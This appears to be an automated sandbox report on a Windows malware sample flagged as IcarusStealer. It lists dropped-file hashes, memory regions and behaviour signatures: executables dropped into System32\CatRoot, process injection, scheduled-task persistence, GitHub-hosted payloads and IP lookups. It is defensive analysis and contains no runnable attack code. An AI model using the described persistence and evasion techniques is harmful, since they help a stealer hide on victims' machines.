| SHA512 | d61a7bdf7d80f5221f5f4ac6b54885640c2a891bdcffde918f064f820307b6cbae961aa9b3a94c46e82497213121fd788e5703687872e7d7528fc341bf263941 |
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | d7dc84d17e21bad7b9a1b27cc17dc7a3 |
| SHA1 | df1231d0f25115daa51e143011ae1516819ecfb9 |
| SHA256 | 6723c6a235efa80759f73f0d7649d34afeabd2d17dbcc492a1233524f958b68a |
| SHA512 | 0795c92bac327b8c4900abb51e3b9670de1a4f5e3683bc9b2ee60b0143bf59a7d0332ac3343ab7b3913070be673e01350f85348b2607cf1d9b71a690a2b26726 |
memory/2180-98-0x0000000074520000-0x0000000074C0E000-memory.dmp
memory/1436-100-0x00000000042B0000-0x00000000042B1000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
| MD5 | 8531d64203df388204049aa08e1fc160 |
| SHA1 | 713ee984cbddbcc1356bd3b43fa75fd1321e6220 |
| SHA256 | 1992af39d714a1346301054a096880ef7a1c657c957196f5b5d435907da1bfdf |
| SHA512 | 50abaab97be4404975788cbb15a0a71c7a4c44844e5b789c25a012e60d78aa01dbb46986736ff655da0b0882b5ab0271da6474ad12c81ba0922b93f2e9c9c2db |
C:\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | 4a66a497b15cf47d7070ad1b55934707 |
| SHA1 | 6e0517975ecd585899a6b2e681d7d9a517211d90 |
| SHA256 | 70725500b63afba3d48e85553625f464257a963199097b0fa73390d53c12d52f |
| SHA512 | 118006a28320e42ec1140cff1dd6b927e46a7dbd2ff96fe3989f99b9a6efbacd549d9484d8d18060fe9facea54b2fad3198de6135b3654f0927275dd1a41035d |
\Windows\System32\catroot\$SXR\$SXR.exe
| MD5 | f7e3ae634ed6c1a638bea089d003e774 |
| SHA1 | ac0801aee519bcbd9a1e6cfc9f4ebd1821ab2d54 |
| SHA256 | be3cad1abd5b9a1f0d841416a0f1bf5be762d60080e326251ad3907d43d6364f |
| SHA512 | eb1594c1110e2f75b0f85e6336faa6c1b2a208ceb97b9c4f573aa351d92df714b7500744c263c8f210d528965dbfa3191cc33fc611c69616a5bd3c2ea6936b29 |
memory/2976-105-0x0000000074520000-0x0000000074C0E000-memory.dmp
memory/2976-104-0x00000000000A0000-0x00000000006E0000-memory.dmp
memory/776-106-0x0000000074520000-0x0000000074C0E000-memory.dmp
memory/2604-107-0x000000013FAD0000-0x000000013FF0C000-memory.dmp
memory/2976-108-0x00000000050C0000-0x0000000005100000-memory.dmp
C:\Windows\System32\CatRoot\$SXR\Read.txt
| MD5 | 79668a6729f0f219835c62c9e43b7927 |
| SHA1 | 0cbbc7cc8dbd27923b18285960640f3dad96d146 |
| SHA256 | 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e |
| SHA512 | bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3 |
C:\Users\Admin\AppData\Local\Temp\Cab56BA.tmp
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
memory/1744-129-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp
C:\Users\Admin\AppData\Roaming\temp0923
| MD5 | f54e0ad084d6b44f4a7ff94514ba0fb8 |
| SHA1 | 3e168eb2b1b20a00c079ce59941e4235a5129534 |
| SHA256 | f70ff68f63bdbc74f20647d2f96c1c9e4c1b783f059f901a6c2d09b1741fba1a |
| SHA512 | 404f73505792ffb73a82a004afa9f4e7423cacae6dc945532d1434970fc9e4836da9497734ab9e9a41f5b1b2c07ff6a78036d328b332ba78204eede011117a28 |
memory/1744-131-0x000000001AFD0000-0x000000001B050000-memory.dmp
memory/2976-133-0x0000000000B10000-0x0000000000B1E000-memory.dmp
memory/1436-134-0x00000000042B0000-0x00000000042B1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Tar875E.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
C:\Users\Admin\AppData\Local\Temp\tmp87FD.tmp.bat
| MD5 | 77254e2811a755365d545e1d3ff9f2d3 |
| SHA1 | a636da37c78d35f5ae4da354ba713828c84bbc1d |
| SHA256 | 93d089dd1ca2d4aceb2f1ba6af5576e5af340026e28a93bc3f65cf9a39674505 |
| SHA512 | 109f6917181e2eb904f449bda73ee879258b3ecc943396662c3fb283e7ec0f723fc2b5ab1e17bc1c0400b51d8408869e126a76a81259cee48b7464d110ce84a0 |
C:\Users\Admin\AppData\Local\Temp\tmp87FE.tmp.bat
| MD5 | 349b281348437ed07fd0c7327bf2535d |
| SHA1 | 62c0050fd13a243ccdd64646c8653fde582cc5f9 |
| SHA256 | 014ec5b69f23ad91fc7f33a0b33612020b644cb82259f356e546b3df5d468658 |
| SHA512 | 22fee32e7ddb5d3daeb65fe969c5c872d99278f337386b7cc1301396c69a22d413625e46bf358f43d9e1b41a8168962be1dba081302beb8c37f2d7acfc83b656 |
memory/2976-170-0x0000000074520000-0x0000000074C0E000-memory.dmp
memory/1436-190-0x0000000003D80000-0x0000000003D90000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-09 22:40
Reported
2024-03-09 22:42
Platform
win10v2004-20240226-en
Max time kernel
103s
Max time network
152s
Command Line
Signatures
IcarusStealer
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Test cheat.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cvtresa.exe | N/A |
| N/A | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1592 set thread context of 3608 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E1.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E1.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8B95.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8B95.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8B95.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7982.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7982.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7982.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8B95.tmp-\CustomActionManaged.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI42E1.tmp-\CustomActionManaged.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B85FAA6E-A9AA-4655-9029-E1A4EDC05E1A} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e583e8b.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e583e8b.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI4263.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7982.tmp-\CustomActionManaged.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7E46.tmp | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Software\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\SOFTWARE\Microsoft\Internet Explorer\GPU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3270530367-132075249-2153716227-1000\{F64B64BB-6490-4009-870B-B33E80404548} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
